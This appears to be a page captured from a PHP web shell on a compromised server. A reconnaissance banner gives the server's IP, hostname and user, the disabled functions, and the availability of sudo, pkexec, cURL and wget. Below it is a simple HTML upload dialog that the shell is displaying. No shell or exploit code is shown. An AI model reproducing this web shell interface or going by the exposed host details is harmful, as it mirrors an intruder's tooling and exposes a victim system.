Server IP : 51.89.169.208 / Your IP : 18.219.218.77 Web Server : Apache System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64 User : yellowleaf ( 1019) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/yellowleaf/public_html/junk/ajax_up/ |
Upload File : |
<!doctype html> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>upload</title> <style type="text/css"> .web_dialog_overlay{position: fixed;top: 0;right: 0;bottom: 0;left: 0;height: 100%;width: 100%;margin: 0;padding: 0;background: #000000;opacity: .15;filter: alpha(opacity=15);-moz-opacity: .15;z-index: 101;display: none;} .web_dialog{display: none;position: fixed;width: 930px;height: 80%;top: 50%;left: 50%;background-color: #ffffff;padding: 10px;z-index: 102;font-family: Verdana;font-size: 10pt;} .align_right{text-align: right;} .curv7{border-radius: 7px;-webkit-border-radius: 7px;-moz-border-radius: 7px;-o-border-radius: 7px;-khtml-border-radius: 7px;} </style> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript"> var min=8; var max=18; function CenterItem(theItem){ var winWidth=$(window).width(); var winHeight=$(window).height(); var windowCenter=winWidth/2; var itemCenter=$(theItem).width()/2; var theCenter=windowCenter-itemCenter; var windowMiddle=winHeight/2; var itemMiddle=$(theItem).height()/2; var theMiddle=windowMiddle-itemMiddle; if(winWidth>$(theItem).width()){ //horizontal $(theItem).css('left',theCenter); } else { $(theItem).css('left','0'); } if(winHeight>$(theItem).height()){ //vertical $(theItem).css('top',theMiddle); } else { $(theItem).css('top','0'); } } $(document).ready(function (){CenterItem('#dialog');}); function ShowDialog(id){ var modal = true; $("#overlay").fadeIn(function(){$("#dialog").slideDown('slow',function(){$("#dialogCn").fadeIn();});}); if (modal){$("#overlay").unbind("click"); }else{$("#overlay").click(function (e){HideDialog();});} } function HideDialog(){ $("#dialogCn").fadeOut('fast',function(){$("#dialog").slideUp('slow',function(){$("#overlay").fadeOut();});}); } </script> </head> <body> <div onclick="ShowDialog('1')" id="aaabtnShowSimple">EAT MY CRUNCHY BALLS</div> <div id="output"></div> <div id="overlay" class="web_dialog_overlay"></div> <div id="dialog" style="font-size:12pt" class="web_dialog curv7"> <div id="dialogCn" style="display:none"> <div style="color:#555;position:absolute;left:935px;top:-14px;z-index:9999999999999999;"><a class="btnClose" href="javascript:HideDialog()" id="sa_x" style="outline:0;display:block;width:30px;height:29px;background-position:0px 0px;background-image:url('http://s1.smartaddon.com/x.png');"><!----></a></div> <iframe src="upload.php" name="upload" width="100%" height="100%" style="border:0px"></iframe> </div> </div> </body></html>